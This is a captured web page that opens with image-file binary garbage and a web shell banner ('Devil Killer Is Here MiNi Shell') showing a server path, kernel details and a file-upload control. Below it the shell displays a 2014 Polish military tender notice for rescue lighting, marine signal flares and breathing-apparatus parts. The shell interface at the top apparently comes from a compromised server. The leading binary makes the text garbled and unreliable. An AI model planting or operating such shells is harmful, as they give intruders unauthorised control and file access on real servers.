JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140414/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140414/81289-N-2014.html

<p class="kh_header"><b>Wałcz: Dostawa części do sprzętu gaśniczego i pirotechniki dla Warsztatów Sprzętu Ratowniczego Marynarki Wojennej</b><br>
<b>Numer ogłoszenia: 81289 - 2014; data zamieszczenia: 14.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 4224 , ul. Ciasna 7, 78-601 Wałcz, woj. zachodniopomorskie, tel. 67 2502184, faks 67 2502184, 2502971.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.1rblog.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa części do sprzętu gaśniczego i pirotechniki dla Warsztatów Sprzętu Ratowniczego Marynarki Wojennej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa niżej wymienionego asortymentu:
Zadanie nr 1:
Dostawa oświetlenia do środków ratunkowych, zgodnie z asortymentem podanym 
poniżej:
1BATERIA ELEKTRYCZNA RB2-MC MURDO DANIAMANT -szt. 30	
2BATERIA LIFE GB DANIAMANT-szt.	200
3BATERIA RESCUE MASTER-3B DSB-szt.15
4OŚWIETLENIE AWARYJNE L200 DANIAMANT-szt.	50
5BATERIA DO RADIOTELEFONU TRON TRON TYP 80060-szt.	1
6ZESTAW OŚW. DO PASÓW RATUNKOWYCH -	szt.300
7BATERIA RESCUE-MASTER 2B VIKING	-szt.8
8OŚWIETLENIE WEW. RESCUE DAN.R.INT 2   VIKING-	szt.5
9AUT. ZEST. OŚWIETL.LNK-LJ-02A2-UML1UML	-szt.100
10TAŚMA ODBLASKOWA SAMOPRZYLEPNA 50MM-m90

Zamawiający nie dopuszcza stosowania współzamienników. Stosowania współzamienników nie dopuszcza się ze względu na konstrukcje oraz wymagania producentów (ujęte w dokumentacji technicznej i serwisowej) środków ratunkowych będących w użytkowaniu Sił Zbrojnych RP nie dopuszcza się stosowania zamienników.

Zadanie nr 2 
Dostawa pirotechniki sygnalizacyjnej dla potrzeb ratownictwa morskiego, zgodnie z asortymentem podanym poniżej:
1POCHODNIA MORSKA CZERWONA RĘCZNA SOLAS- szt.300
2RAKIETA SPADOCHRONOWA MORSKA SOLAS-szt.450
3PŁAWKA DYMNA POMARAŃCZOWA SOLAS-szt.150
4MINIFLARA Z MAGAZYNKIEM CZERWONA MK8-	szt.10

Zamawiający nie dopuszcza stosowania współzamienników. Stosowania współzamienników nie dopuszcza się ze względu na konstrukcje oraz wymagania producentów (ujęte w dokumentacji technicznej i serwisowej) środków ratunkowych będących w użytkowaniu Sił Zbrojnych RP nie dopuszcza się stosowania zamienników.

Zadanie nr 3 
Dostawa części zamiennych do aparatu SABRE CENTURION, zgodnie z asortymentem podanym poniżej:
1ZESTAW NAPRAWCZY PO 6 LATACH	950.52.00-szt.	20
 
Zamawiający nie dopuszcza stosowania współzamienników.  Stosowania współzamienników nie dopuszcza dokumentacja technologiczna i serwisowa (będąca w posiadaniu Zamawiającego) - ze względu na zakłócenia parametrów technicznych sprzętu, zagrożenia bezpieczeństwa życia oraz utratę wszystkich gwarancji  i uprawnień serwisowych. 

Zadanie nr 4:
Dostawa części zamiennych do aparatu FASER APS2, FASER APAS3, zgodnie 
z asortymentem podanym poniżej:
1MASKA TWARZOWA PANORAMICZNA MT 848-szt.50
2PŁYTKA ZAWORU APS2 2-50 FASER 562G5-szt.50
3PŁATEK ZAWORU WYDECHOWEGO MASKI MT848 JADZIA	-szt.100
4ZAWÓR WYDECHOWY -szt.	100
5ŁĄCZNIK KOMPLETNY MASKI-szt.30
6ZESTAW NAPRAWCZY AUTOMATU PODCIŚ.-szt.100
7USZCZELKA PROFILOWANA	-szt.200
8USZCZELKA (DO GWIZDKA)	-szt.200
9KORPUS KOMPLETNY-szt.	30
10ZAWÓR -szt.	20
11TRZPIEŃ-szt.	20
12KORPUS-szt.	20
13SPRĘŻYNA-szt.	20
14WKRĘTKA-szt.	20
15WKRĘT DOCISKOWY M3x6-Ms-szt.	20
16KIEROWNICA-szt.	20
17WKRĘT DO BLACH C2,2x6,5-szt.	40
           
Zamawiający nie dopuszcza stosowania współzamienników. Stosowania współzamienników nie dopuszcza dokumentacja technologiczna i serwisowa (będąca w posiadaniu Zamawiającego) - ze względu na zakłócenia parametrów technicznych sprzętu, zagrożenia bezpieczeństwa życia oraz utratę wszystkich gwarancji i uprawnień serwisowych. 

Zadanie nr 5:
Dostawa części zamiennych do aparatu AUER, zgodnie z asortymentem podanym 
poniżej:
1PIERSCIEŃ O-RING-szt.	100
2MEMBRANA -szt.	70
3PIERŚCIEŃ DYSTANSOWY-szt.	50
4PIERSCIEN O-RING HP DM04 -szt.	20
5PIERSCIEN O-RING IP DM04-szt.	20
6MASKA ULTRA ELITE PS-szt.	30
7PŁYTKA ZAWORU WYDECHOWEGO   P Elite-szt.	50
8SMAR SILIKONOWY MOLIKOTE MEDIUM (100g)	-szt.	15
9ZESTAW DO  NAPRAWY GŁÓWNEJ REDUKTORA	-szt.	30
NARZĘDZIA DO EKSPOATACJI			
10KLUCZ DYNAMOMETRYCZNY 2-25NM-szt.	4
11SZCZYPCE ROZSTAWNE Z PLASTIKOWYMI NAKŁADKAMI -szt.	3
12KLUCZ KOŁKOWY DO DM04-szt.	3
13KLUCZ DWUSTRONNY DO LA88/96 AE/AS-szt.	3
14KLUCZ JEDNOSTRONNY DO LA88/96N-szt.	3
15SMAR GLEITMO 595-szt.	5
16WTYKOWA GRZECHOTKA DWUKIERUNKOWA 9x12 3/8 -szt.2

Zamawiający nie dopuszcza stosowania współzamienników. Stosowania współzamienników nie dopuszcza dokumentacja technologiczna i serwisowa (będąca w posiadaniu Zamawiającego) - ze względu na zakłócenia parametrów technicznych sprzętu, zagrożenia bezpieczeństwa życia oraz utratę wszystkich gwarancji i uprawnień serwisowych. 

Zadanie nr 6: 
Dostawa części zamiennych do aparatu FENZY AIR 5500, FENZY AERIS, zgodnie 
z asortymentem podanym poniżej:
1ZESTAW NAPRAWCZY -kpl.	20
2PIERŚCIEŃ O-RING 9x2 -szt.	20
3PIERSCIEŃ O-RING 11x2,5 -szt.	50
4PIERSCIEŃ O-RING 7x2 -szt.	50
5PIERŚCIEŃ O-RING 11x2 -szt.	20
6ZESTAW NAPRAWCZY -kpl.	20
7ZESTAW NAPRAWCZY -kpl.	5
8ZESTAW NAPRAWCZY APARATU ODDECHOWEGO FENZY SX-PRO	-kpl.	2
9ZESTAW DO ŁACZNIKA EN 200/300-kpl.	60

Zamawiający nie dopuszcza stosowania współzamienników. Stosowania współzamienników nie dopuszcza dokumentacja technologiczna i serwisowa (będąca w posiadaniu Zamawiającego) - ze względu na zakłócenia parametrów technicznych sprzętu, zagrożenia bezpieczeństwa życia oraz utratę wszystkich gwarancji i uprawnień serwisowych. 


Zadanie nr 7:
Dostawa części zamiennych do gaśnicy hiperbarycznej HYFEX, zgodnie z asortymentem podanym poniżej:
1PŁYN GAŚNICZY HY-FEX SE 4816-szt.	15
2PŁYN DO GAŚNICY HY-FEX SE 4817-szt.	10

Zamawiający dopuszcza rozwiązania równoważne normom, aprobatom, specyfikacjom technicznym i systemom odniesienia, o których mowa w art. 30 ust. 1-3 ustawy Prawo zamówień publicznych. Wykonawca powołujący się na te rozwiązania jest zobowiązany wykazać w ofercie, że oferowane przez niego dostawy spełniają wszystkie wymagania określone przez Zamawiającego.
Zamawiający dopuszcza możliwość dostarczenia asortymentu równoważnego do płynów gaśniczych wskazanych w zadaniu nr 7, tzn. o nie gorszych (tożsamych) właściwościach i składzie chemicznym. Zaoferowany produkt równoważny musi być co najmniej tożsamy funkcjonalnie..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 35.11.00.00-8, 24.61.30.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 18.07.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający żąda wniesienia wadium na cały przedmiot zamówienia, w wysokości 5 749,00 zł.
2.Zamawiający żąda na poszczególne zadania, wadium w kwotach:
- zadanie 1 -       1 910,00 zł. 
- zadanie 2  -      1 268,00 zł. 
- zadanie 3  -         200,00 zł. 
- zadanie 4 -          880,00 zł. 
- zadanie 5  -      1 193,00 zł. 
- zadanie 6 -          189,00 zł. 
- zadanie 7  -         109,00 zł. 
 3.Wadium może być wnoszone w jednej lub kilku następujących formach:
1)pieniądzu,
2)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)gwarancjach bankowych,
4)gwarancjach ubezpieczeniowych,
5)poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust.5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 Nr 42, poz. 275).
4. W przypadku wniesienia wadium w formie gwarancji, z jej treści winno wynikać bezwarunkowe, (na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą) zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i ust. 5 ustawy Prawo zamówień publicznych.
5.Wadium wnoszone w poręczeniach lub gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w pkt 3 ppkt 5 należy zdeponować przed terminem składania ofert w siedzibie Zamawiającego - budynek nr 2 pokój nr 102, a kopię załączyć do oferty (godziny przyjmowania dokumentów: w dni robocze w godzinach: 7.00 -  14.30). Zamawiający dopuszcza przesłanie oryginału dokumentu za pośrednictwem poczty, w takiej sytuacji dokument należy przesłać na adres Zamawiającego z dopiskiem WADIUM - numer sprawy. Dokument winien być dostarczony Zamawiającemu przed terminem składania ofert.
6. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy zamawiającego:   NBP oo Bydgoszcz nr rach. 47101010780083121391200000
 a) potwierdzenie wniesienia wadium należy dołączyć do oferty w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę lub inną osobę upoważnioną do reprezentowania Wykonawcy. O uznaniu przez Zamawiającego, że wadium w pieniądzu wpłacono w wymaganym terminie, decyduje data wpływu środków na rachunek Zamawiającego.
 b) przy wnoszeniu wadium Wykonawca winien podać: nazwę przedmiotu zamówienia, numer sprawy, numer zadania oraz numer swojego konta, na które należy zwrócić wadium.
 7.   Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy Prawo zamówień publicznych.
8.  Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
9.   Zamawiający zwraca niezwłocznie wadium wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę, na wniosek Wykonawcy który wycofał ofertę przed upływem terminu składania ofert.
10. Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
11. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
12. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach   określonych w ofercie;
2)  nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunku na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu określonego w art. 22 ust. 1 pkt 2 ustawy wymienionego w załączniku nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunku na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu określonego w art. 22 ust. 1 pkt 2 ustawy wymienionego w załączniku nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunku na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu określonego w art. 22 ust. 1 pkt 3 ustawy - wymienionego w załączniku nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunku na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu określonego w art. 22 ust. 1 pkt 3 ustawy - wymienionego w załączniku nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunku na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu określonego w art. 22 ust. 1 pkt 4 ustawy wymienionego w załączniku nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez  zamawiającego wymaga się aby Wykonawca:
1. złożył do oferty listę z wyszczególnieniem danych identyfikujących zaoferowany przedmiot zamówienia - niniejsze oświadczenie składają Wykonawcy, którzy złożyli ofertę na zadanie nr 7,
2. oświadczył, że zaoferowane płyny gaśnicze wskazane w zadaniu nr 7 są o nie gorszych (tożsamych) właściwościach i składzie chemicznym - niniejsze oświadczenie składają Wykonawcy którzy w zadaniu nr 7 zaoferowali równoważne płyny gaśnicze.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2.	Zamawiający zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych przewiduje możliwość wprowadzenia istotnych zmian do treści zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, jeżeli one dotyczą: 
a)	zmiany świadczenia Wykonawcy na świadczenie lepszej jakości przy zachowaniu   tożsamości    przedmiotu zamówienia,
b)	wydłużenia terminu wykonania umowy z powodu okoliczności niezależnych od Wykonawcy,
c)	zmiany danych Wykonawcy ( np. zmiana siedziby, adresu, nazwy),
d)	podwykonawcy uczestniczącego w realizacji umowy, w wypadku, kiedy Wykonawca określi go, co do tożsamości w ofercie,
e) zmiany stawki podatku VAT, w zakresie przedmiotu zamówienia, w wypadku ustawowych zmian w tym zakresie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.1rblog.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> JW4224 Wałcz, ul. Ciasna 7, 78-601 WAŁCZ..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.04.2014 godzina 09:30, miejsce: Kancelaria Jawna Zamawiającego budynek nr 1 pok. nr 7-8 od PN-Pt w godz. 7.00-15.00, Otwarcie ofert - 24.04.2014, godz. 10:00 siedziba Zamawiającego, budynek nr 1, pokój 112-113.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa oświetlenia do środków ratunkowych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1BATERIA ELEKTRYCZNA RB2-MC MURDO DANIAMANT -szt. 30	
2BATERIA LIFE GB DANIAMANT-szt.	200
3BATERIA RESCUE MASTER-3B DSB-szt.15
4OŚWIETLENIE AWARYJNE L200 DANIAMANT-szt.	50
5BATERIA DO RADIOTELEFONU TRON TRON TYP 80060-szt.	1
6ZESTAW OŚW. DO PASÓW RATUNKOWYCH -	szt.300
7BATERIA RESCUE-MASTER 2B VIKING	-szt.8
8OŚWIETLENIE WEW. RESCUE DAN.R.INT 2   VIKING-	szt.5
9AUT. ZEST. OŚWIETL.LNK-LJ-02A2-UML1UML	-szt.100
10TAŚMA ODBLASKOWA SAMOPRZYLEPNA 50MM-m90

Zamawiający nie dopuszcza stosowania współzamienników. Stosowania współzamienników nie dopuszcza się ze względu na konstrukcje oraz wymagania producentów (ujęte w dokumentacji technicznej i serwisowej) środków ratunkowych będących w użytkowaniu Sił Zbrojnych RP nie dopuszcza się stosowania zamienników..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.11.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa pirotechniki sygnalizacyjnej dla potrzeb ratownictwa morskiego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1POCHODNIA MORSKA CZERWONA RĘCZNA SOLAS- szt.300
2RAKIETA SPADOCHRONOWA MORSKA SOLAS-szt.450
3PŁAWKA DYMNA POMARAŃCZOWA SOLAS-szt.150
4MINIFLARA Z MAGAZYNKIEM CZERWONA MK8-	szt.10

Zamawiający nie dopuszcza stosowania współzamienników. Stosowania współzamienników nie dopuszcza się ze względu na konstrukcje oraz wymagania producentów (ujęte w dokumentacji technicznej i serwisowej) środków ratunkowych będących w użytkowaniu Sił Zbrojnych RP nie dopuszcza się stosowania zamienników..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.61.30.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
